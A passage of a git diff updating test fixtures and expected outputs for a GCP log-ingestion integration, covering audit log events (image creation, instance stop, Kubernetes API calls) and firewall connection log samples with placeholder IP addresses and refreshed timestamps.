"{\"insertId\":\"v2spcwdzmc2\",\"logName\":\"projects/foo/logs/cloudaudit.googleapis.com%2Factivity\",\"operation\":{\"first\":true,\"id\":\"operation-1596664766354-5ac287c395484-fa3923bd-543e018e\",\"producer\":\"compute.googleapis.com\"},\"protoPayload\":{\"@type\":\"type.googleapis.com/google.cloud.audit.AuditLog\",\"authenticationInfo\":{\"principalEmail\":\"user@mycompany.com\"},\"authorizationInfo\":[{\"granted\":true,\"permission\":\"compute.images.create\",\"resourceAttributes\":{\"name\":\"projects/foo/global/images/windows-server-2016-v20200805\",\"service\":\"compute\",\"type\":\"compute.images\"}}],\"methodName\":\"v1.compute.images.insert\",\"request\":{\"@type\":\"type.googleapis.com/compute.images.insert\",\"family\":\"windows-server-2016\",\"guestOsFeatures\":[{\"type\":\"VIRTIO_SCSI_MULTIQUEUE\"},{\"type\":\"WINDOWS\"}],\"name\":\"windows-server-2016-v20200805\",\"rawDisk\":{\"source\":\"https://storage.googleapis.com/storage/v1/b/foo/o/windows-server-2016-v20200805.tar.gz\"},\"sourceType\":\"RAW\"},\"requestMetadata\":{\"callerIp\":\"1.2.3.4\",\"callerSuppliedUserAgent\":\"google-cloud-sdk gcloud/290.0.1 command/gcloud.compute.images.create invocation-id/032752ad0fa44b4ea951951d2deef6a3 environment/None environment-version/None interactive/True from-script/False python/2.7.17 term/xterm-256color (Macintosh; Intel Mac OS X 19.6.0),gzip(gfe)\",\"destinationAttributes\":{},\"requestAttributes\":{\"auth\":{},\"time\":\"2020-08-05T21:59:27.515Z\"}},\"resourceLocation\":{\"currentLocations\":[\"eu\"]},\"resourceName\":\"projects/foo/global/images/windows-server-2016-v20200805\",\"response\":{\"@type\":\"type.googleapis.com/operation\",\"id\":\"44919313\",\"insertTime\":\"2020-08-05T14:59:27.259-07:00\",\"name\":\"operation-1596664766354-5ac287c395484-fa3923bd-543e018e\",\"operationType\":\"insert\",\"progress\":\"0\",\"selfLink\":\"https://www.googleapis.com/compute/v1/projects/foo/global/operations/operation-1596664766354-5ac287c395484-fa3923bd-543e018e\",\"selfLinkWithId\":\"https://www.googleapis.com/compute/v1/projects/foo/global/operations/4491931805423146320\",\"startTime\":\"2020-08-05T14:59:27.274-07:00\",\"status\":\"RUNNING\",\"targetId\":\"12345\",\"targetLink\":\"https://www.googleapis.com/compute/v1/projects/foo/global/images/windows-server-2016-v20200805\",\"user\":\"user@mycompany.com\"},\"serviceName\":\"compute.googleapis.com\"},\"receiveTimestamp\":\"2020-08-05T21:59:27.822546978Z\",\"resource\":{\"labels\":{\"image_id\":\"771879043\",\"project_id\":\"foo\"},\"type\":\"gce_image\"},\"severity\":\"NOTICE\",\"timestamp\":\"2020-08-05T21:59:26.456Z\"}", + "ingested": "2021-12-09T13:37:42.255780100Z", + "original": "{\"insertId\":\"v2spcwdzmc2\",\"logName\":\"projects/foo/logs/cloudaudit.googleapis.com%2Factivity\",\"operation\":{\"first\":true,\"id\":\"operation-1596664766354-5ac287c395484-fa3923bd-543e018e\",\"producer\":\"compute.googleapis.com\"},\"protoPayload\":{\"@type\":\"type.googleapis.com/google.cloud.audit.AuditLog\",\"authenticationInfo\":{\"principalEmail\":\"user@mycompany.com\"},\"authorizationInfo\":[{\"granted\":true,\"permission\":\"compute.images.create\",\"resourceAttributes\":{\"name\":\"projects/foo/global/images/windows-server-2016-v20200805\",\"service\":\"compute\",\"type\":\"compute.images\"}}],\"methodName\":\"v1.compute.images.insert\",\"request\":{\"@type\":\"type.googleapis.com/compute.images.insert\",\"family\":\"windows-server-2016\",\"guestOsFeatures\":[{\"type\":\"VIRTIO_SCSI_MULTIQUEUE\"},{\"type\":\"WINDOWS\"}],\"name\":\"windows-server-2016-v20200805\",\"rawDisk\":{\"source\":\"https://storage.googleapis.com/storage/v1/b/foo/o/windows-server-2016-v20200805.tar.gz\"},\"sourceType\":\"RAW\"},\"requestMetadata\":{\"callerIp\":\"67.43.156.13\",\"callerSuppliedUserAgent\":\"google-cloud-sdk gcloud/290.0.1 command/gcloud.compute.images.create invocation-id/032752ad0fa44b4ea951951d2deef6a3 environment/None environment-version/None interactive/True from-script/False python/2.7.17 term/xterm-256color (Macintosh; Intel Mac OS X 19.6.0),gzip(gfe)\",\"destinationAttributes\":{},\"requestAttributes\":{\"auth\":{},\"time\":\"2020-08-05T21:59:27.515Z\"}},\"resourceLocation\":{\"currentLocations\":[\"eu\"]},\"resourceName\":\"projects/foo/global/images/windows-server-2016-v20200805\",\"response\":{\"@type\":\"type.googleapis.com/operation\",\"id\":\"44919313\",\"insertTime\":\"2020-08-05T14:59:27.259-07:00\",\"name\":\"operation-1596664766354-5ac287c395484-fa3923bd-543e018e\",\"operationType\":\"insert\",\"progress\":\"0\",\"selfLink\":\"https://www.googleapis.com/compute/v1/projects/foo/global/operations/operation-1596664766354-5ac287c395484-fa3923bd-543e018e\",\"selfLinkWithId\":\"https://www.googleapis.com/compute/v1/projects/foo/global/operations/4491931805423146320\",\"startTime\":\"2020-08-05T14:59:27.274-07:00\",\"status\":\"RUNNING\",\"targetId\":\"12345\",\"targetLink\":\"https://www.googleapis.com/compute/v1/projects/foo/global/images/windows-server-2016-v20200805\",\"user\":\"user@mycompany.com\"},\"serviceName\":\"compute.googleapis.com\"},\"receiveTimestamp\":\"2020-08-05T21:59:27.822546978Z\",\"resource\":{\"labels\":{\"image_id\":\"771879043\",\"project_id\":\"foo\"},\"type\":\"gce_image\"},\"severity\":\"NOTICE\",\"timestamp\":\"2020-08-05T21:59:26.456Z\"}", "id": "v2spcwdzmc2", "kind": "event", "outcome": "success" @@ -510,25 +498,7 @@ "logger": "projects/foo/logs/cloudaudit.googleapis.com%2Factivity" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "FR-63", - "city_name": "Clermont-Ferrand", - "country_iso_code": "FR", - "country_name": "France", - "region_name": "Puy-de-Dôme", - "location": { - "lon": 3.0966, - "lat": 45.7838 - } - }, - "as": { - "number": 3215, - "organization": { - "name": "Orange" - } - }, - "ip": "2.3.4.5" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -555,7 +525,7 @@ }, "method_name": "beta.compute.instances.stop", "request_metadata": { - "caller_ip": "2.3.4.5", + "caller_ip": "67.43.156.13", "caller_supplied_user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0,gzip(gfe),gzip(gfe)" }, "service_name": "compute.googleapis.com", @@ -568,8 +538,8 @@ }, "event": { "action": "beta.compute.instances.stop", - "ingested": "2021-06-09T10:48:28.604095200Z", - "original": "{\"insertId\":\"-c7ctxmd2zab\",\"logName\":\"projects/foo/logs/cloudaudit.googleapis.com%2Factivity\",\"operation\":{\"id\":\"operation-1596646123456-5ac2438b775f6-f8ca1382-e70b6831\",\"last\":true,\"producer\":\"compute.googleapis.com\"},\"protoPayload\":{\"@type\":\"type.googleapis.com/google.cloud.audit.AuditLog\",\"authenticationInfo\":{\"principalEmail\":\"user@mycompany.com\"},\"methodName\":\"beta.compute.instances.stop\",\"request\":{\"@type\":\"type.googleapis.com/compute.instances.stop\"},\"requestMetadata\":{\"callerIp\":\"2.3.4.5\",\"callerSuppliedUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0,gzip(gfe),gzip(gfe)\"},\"resourceName\":\"projects/foo/zones/us-central1-a/instances/win10-test\",\"serviceName\":\"compute.googleapis.com\"},\"receiveTimestamp\":\"2020-08-05T16:56:41.315135528Z\",\"resource\":{\"labels\":{\"instance_id\":\"590261181\",\"project_id\":\"foo\",\"zone\":\"us-central1-a\"},\"type\":\"gce_instance\"},\"severity\":\"NOTICE\",\"timestamp\":\"2020-08-05T16:56:40.428Z\"}", + "ingested": "2021-12-09T13:37:42.255784900Z", + "original": "{\"insertId\":\"-c7ctxmd2zab\",\"logName\":\"projects/foo/logs/cloudaudit.googleapis.com%2Factivity\",\"operation\":{\"id\":\"operation-1596646123456-5ac2438b775f6-f8ca1382-e70b6831\",\"last\":true,\"producer\":\"compute.googleapis.com\"},\"protoPayload\":{\"@type\":\"type.googleapis.com/google.cloud.audit.AuditLog\",\"authenticationInfo\":{\"principalEmail\":\"user@mycompany.com\"},\"methodName\":\"beta.compute.instances.stop\",\"request\":{\"@type\":\"type.googleapis.com/compute.instances.stop\"},\"requestMetadata\":{\"callerIp\":\"67.43.156.13\",\"callerSuppliedUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0,gzip(gfe),gzip(gfe)\"},\"resourceName\":\"projects/foo/zones/us-central1-a/instances/win10-test\",\"serviceName\":\"compute.googleapis.com\"},\"receiveTimestamp\":\"2020-08-05T16:56:41.315135528Z\",\"resource\":{\"labels\":{\"instance_id\":\"590261181\",\"project_id\":\"foo\",\"zone\":\"us-central1-a\"},\"type\":\"gce_instance\"},\"severity\":\"NOTICE\",\"timestamp\":\"2020-08-05T16:56:40.428Z\"}", "id": "-c7ctxmd2zab", "kind": "event", "outcome": "unknown" @@ -643,7 +613,7 @@ }, "event": { "action": "io.k8s.core.v1.nodes.list", - "ingested": "2021-06-09T10:48:28.604100600Z", + "ingested": "2021-12-09T13:37:42.255788900Z", "original": "{\"insertId\":\"94170ac4-6e82-4345-98ad-3c780222d19d\",\"labels\":{\"authorization.k8s.io/decision\":\"allow\",\"authorization.k8s.io/reason\":\"\"},\"logName\":\"projects/elastic-siem/logs/cloudaudit.googleapis.com%2Fdata_access\",\"operation\":{\"first\":true,\"id\":\"94170ac4-6e82-4345-98ad-3c780222d19d\",\"last\":true,\"producer\":\"k8s.io\"},\"protoPayload\":{\"@type\":\"type.googleapis.com/google.cloud.audit.AuditLog\",\"authenticationInfo\":{\"principalEmail\":\"xxx@xxx.xxx\"},\"authorizationInfo\":[{\"granted\":true,\"permission\":\"io.k8s.core.v1.nodes.list\",\"resource\":\"core/v1/nodes\"}],\"methodName\":\"io.k8s.core.v1.nodes.list\",\"requestMetadata\":{\"callerIp\":\"192.168.1.1\",\"callerSuppliedUserAgent\":\"GoogleCloudConsole\"},\"resourceName\":\"core/v1/nodes\",\"serviceName\":\"k8s.io\",\"status\":{}},\"receiveTimestamp\":\"2021-04-23T14:47:31.94822935Z\",\"resource\":{\"labels\":{\"cluster_name\":\"analysis-cluster\",\"location\":\"us-central1-a\",\"project_id\":\"elastic-siem\"},\"type\":\"k8s_cluster\"},\"timestamp\":\"2021-04-23T14:47:07.535383Z\"}", "id": "94170ac4-6e82-4345-98ad-3c780222d19d", "kind": "event", @@ -712,7 +682,7 @@ }, "event": { "action": "io.k8s.extensions.v1beta1.ingresses.list", - "ingested": "2021-06-09T10:48:28.604105600Z", + "ingested": "2021-12-09T13:37:42.255793600Z", "original": "{\"insertId\":\"b10a904a-faa4-4e0d-9ec3-7bc6a180196a\",\"labels\":{\"authorization.k8s.io/decision\":\"allow\",\"authorization.k8s.io/reason\":\"\",\"k8s.io/deprecated\":\"true\",\"k8s.io/removed-release\":\"1.22\"},\"logName\":\"projects/elastic-siem/logs/cloudaudit.googleapis.com%2Fdata_access\",\"operation\":{\"first\":true,\"id\":\"b10a904a-faa4-4e0d-9ec3-7bc6a180196a\",\"last\":true,\"producer\":\"k8s.io\"},\"protoPayload\":{\"@type\":\"type.googleapis.com/google.cloud.audit.AuditLog\",\"authenticationInfo\":{\"principalEmail\":\"xxx@xxx.xxx\"},\"authorizationInfo\":[{\"granted\":true,\"permission\":\"io.k8s.extensions.v1beta1.ingresses.list\",\"resource\":\"extensions/v1beta1/namespaces/cos-auditd/ingresses\"}],\"methodName\":\"io.k8s.extensions.v1beta1.ingresses.list\",\"requestMetadata\":{\"callerIp\":\"192.168.1.1\",\"callerSuppliedUserAgent\":\"GoogleCloudConsole\"},\"resourceName\":\"extensions/v1beta1/namespaces/cos-auditd/ingresses\",\"serviceName\":\"k8s.io\",\"status\":{}},\"receiveTimestamp\":\"2021-04-23T14:16:36.37362467Z\",\"resource\":{\"labels\":{\"cluster_name\":\"analysis-cluster\",\"location\":\"us-central1-a\",\"project_id\":\"elastic-siem\"},\"type\":\"k8s_cluster\"},\"timestamp\":\"2021-04-23T14:16:07.574776Z\"}", "id": "b10a904a-faa4-4e0d-9ec3-7bc6a180196a", "kind": "event", @@ -781,7 +751,7 @@ }, "event": { "action": "io.k8s.get", - "ingested": "2021-06-09T10:48:28.604110700Z", + "ingested": "2021-12-09T13:37:42.255799400Z", "original": "{\"insertId\":\"e973134d-b4d5-4e2f-92b8-82bba13fdb92\",\"labels\":{\"authorization.k8s.io/decision\":\"allow\",\"authorization.k8s.io/reason\":\"RBAC: allowed by ClusterRoleBinding \\\"system:public-info-viewer\\\" of ClusterRole \\\"system:public-info-viewer\\\" to Group \\\"system:unauthenticated\\\"\"},\"logName\":\"projects/elastic-siem/logs/cloudaudit.googleapis.com%2Fdata_access\",\"operation\":{\"first\":true,\"id\":\"e973134d-b4d5-4e2f-92b8-82bba13fdb92\",\"last\":true,\"producer\":\"k8s.io\"},\"protoPayload\":{\"@type\":\"type.googleapis.com/google.cloud.audit.AuditLog\",\"authenticationInfo\":{\"principalEmail\":\"system:anonymous\"},\"authorizationInfo\":[{\"granted\":true,\"permission\":\"io.k8s.get\",\"resource\":\"readyz\"}],\"methodName\":\"io.k8s.get\",\"requestMetadata\":{\"callerIp\":\"127.0.0.1\",\"callerSuppliedUserAgent\":\"kube-probe/1.19+\"},\"resourceName\":\"readyz\",\"serviceName\":\"k8s.io\",\"status\":{}},\"receiveTimestamp\":\"2021-04-29T08:19:21.606980385Z\",\"resource\":{\"labels\":{\"cluster_name\":\"analysis-cluster\",\"location\":\"us-central1-a\",\"project_id\":\"elastic-siem\"},\"type\":\"k8s_cluster\"},\"timestamp\":\"2021-04-29T08:19:20.80581Z\"}", "id": "e973134d-b4d5-4e2f-92b8-82bba13fdb92", "kind": "event", @@ -850,7 +820,7 @@ }, "event": { "action": "io.k8s.get", - "ingested": "2021-06-09T10:48:28.604116200Z", + "ingested": "2021-12-09T13:37:42.255803700Z", "original": "{\"insertId\":\"03adfb9f-71a3-4f41-9701-29b5542f4d22\",\"labels\":{\"authorization.k8s.io/decision\":\"allow\",\"authorization.k8s.io/reason\":\"RBAC: allowed by ClusterRoleBinding \\\"system:discovery\\\" of ClusterRole \\\"system:discovery\\\" to Group \\\"system:authenticated\\\"\"},\"logName\":\"projects/elastic-siem/logs/cloudaudit.googleapis.com%2Fdata_access\",\"operation\":{\"first\":true,\"id\":\"03adfb9f-71a3-4f41-9701-29b5542f4d22\",\"last\":true,\"producer\":\"k8s.io\"},\"protoPayload\":{\"@type\":\"type.googleapis.com/google.cloud.audit.AuditLog\",\"authenticationInfo\":{\"principalEmail\":\"system:serviceaccount:kube-system:generic-garbage-collector\"},\"authorizationInfo\":[{\"granted\":true,\"permission\":\"io.k8s.get\",\"resource\":\"api/v1\"}],\"methodName\":\"io.k8s.get\",\"requestMetadata\":{\"callerIp\":\"::1\",\"callerSuppliedUserAgent\":\"kube-controller-manager/v1.19.8 (linux/amd64) kubernetes/4f6f69f/system:serviceaccount:kube-system:generic-garbage-collector\"},\"resourceName\":\"api/v1\",\"serviceName\":\"k8s.io\",\"status\":{}},\"receiveTimestamp\":\"2021-04-29T08:23:19.71757101Z\",\"resource\":{\"labels\":{\"cluster_name\":\"analysis-cluster\",\"location\":\"us-central1-a\",\"project_id\":\"elastic-siem\"},\"type\":\"k8s_cluster\"},\"timestamp\":\"2021-04-29T08:23:18.899153Z\"}", "id": "03adfb9f-71a3-4f41-9701-29b5542f4d22", "kind": "event", diff --git a/packages/gcp/data_stream/firewall/_dev/test/pipeline/test-firewall.log b/packages/gcp/data_stream/firewall/_dev/test/pipeline/test-firewall.log index 0843196acc5..7b3ab77e457 100644 --- a/packages/gcp/data_stream/firewall/_dev/test/pipeline/test-firewall.log +++ b/packages/gcp/data_stream/firewall/_dev/test/pipeline/test-firewall.log @@ -1,22 +1,22 @@ {"insertId":"1dobeotg13df9f5","jsonPayload":{"connection":{"dest_ip":"10.128.0.16","dest_port":80,"protocol":6,"src_ip":"10.142.0.10","src_port":57794},"disposition":"DENIED","instance":{"project_id":"local-test","region":"us-central1","vm_name":"local-adrian-test","zone":"us-central1-a"},"remote_instance":{"project_id":"remote-beats","region":"us-east1","vm_name":"test-es","zone":"us-east1-b"},"remote_vpc":{"project_id":"remote-beats","subnetwork_name":"mysubnet","vpc_name":"default"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"mysubnet","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-06T16:41:45.009675991Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"12345667","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-06T16:41:38.394575419Z"} {"insertId":"1dobeotg13df9f7","jsonPayload":{"connection":{"dest_ip":"10.128.0.10","dest_port":57794,"protocol":6,"src_ip":"10.142.0.16","src_port":80},"disposition":"DENIED","instance":{"project_id":"local-test","region":"us-central1","vm_name":"local-adrian-test","zone":"us-central1-a"},"remote_instance":{"project_id":"remote-beats","region":"us-east1","vm_name":"test-es","zone":"us-east1-b"},"remote_vpc":{"project_id":"remote-beats","subnetwork_name":"mysubnet","vpc_name":"default"},"rule_details":{"action":"DENY","direction":"EGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"mysubnet","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-06T16:41:45.009675991Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"892378332","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-06T16:41:38.394575419Z"} -{"insertId":"4zuj4nfn4llkb","jsonPayload":{"connection":{"dest_ip":"8.8.8.8","dest_port":53,"protocol":17,"src_ip":"10.128.0.16","src_port":60094},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"America","country":"usa"},"rule_details":{"action":"DENY","destination_range":["8.8.8.0/24"],"direction":"EGRESS","ip_port_info":[{"ip_protocol":"ALL"}],"priority":1000,"reference":"network:default/firewall:adrian-test-1","target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-12T12:35:24.466374097Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-12T12:35:17.214711274Z"} -{"insertId":"1f21ciqfpfssuo","jsonPayload":{"connection":{"dest_ip":"10.42.0.2","dest_port":3389,"protocol":6,"src_ip":"192.0.2.126","src_port":64853},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-windows","zone":"us-east1-b"},"remote_location":{"continent":"Asia","country":"omn"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["3389"]}],"priority":1000,"reference":"network:windows-isolated/firewall:windows-isolated-allow-rdp","source_range":["0.0.0.0/0"],"target_tag":["allow-rdp"]},"vpc":{"project_id":"test-beats","subnetwork_name":"windows-isolated","vpc_name":"windows-isolated"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-10-30T13:52:54.473174731Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"3238409883146034900","subnetwork_name":"windows-isolated"},"type":"gce_subnetwork"},"timestamp":"2019-10-30T13:52:42.191988835Z"} -{"insertId":"8vcfeailjd","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":8080,"protocol":6,"src_ip":"192.0.2.219","src_port":2897},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Krasnodar","continent":"Europe","country":"rus","region":"Krasnodar Krai"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:31:22.738796433Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:31:19.421478847Z"} -{"insertId":"1bqgmw9feiabij","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.0.2.14","src_port":61000},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"Europe","country":"deu"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:41:35.727004321Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:41:31.079508196Z"} -{"insertId":"1jrxaqbfe48bir","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.0.2.14","src_port":61000},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"Europe","country":"deu"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:41:40.791816098Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:41:34.190831607Z"} -{"insertId":"1fw7drlfe2ty27","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":8080,"protocol":6,"src_ip":"192.0.2.151","src_port":62551},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Berdychiv","continent":"Europe","country":"ukr","region":"Zhytomyr Oblast"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:48:47.038820509Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:48:41.449552758Z"} -{"insertId":"1yre751fekaxzs","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":8080,"protocol":6,"src_ip":"192.0.2.241","src_port":44542},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Vicenza","continent":"Europe","country":"ita","region":"Veneto"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T13:10:30.804549999Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T13:10:24.214995318Z"} -{"insertId":"5kanfzfiqepkh","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.0.2.114","src_port":41293},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Tula","continent":"Europe","country":"rus","region":"Tula Oblast"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T13:35:28.934918322Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T13:35:23.504719962Z"} -{"insertId":"59z0t8fiow9vg","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.0.2.251","src_port":59106},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Stavropol","continent":"Europe","country":"rus","region":"Stavropol Krai"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T13:36:54.238077643Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T13:36:52.135887769Z"} -{"insertId":"1y7e4yzff816cq","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.0.2.189","src_port":61000},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Violès","continent":"Europe","country":"fra","region":"Provence-Alpes-Côte d'Azur"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T14:06:26.357446279Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T14:06:16.59353182Z"} -{"insertId":"lx5jlsfggpr0q","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.0.2.189","src_port":61000},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Violès","continent":"Europe","country":"fra","region":"Provence-Alpes-Côte d'Azur"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T14:06:28.203068653Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T14:06:22.930570324Z"} 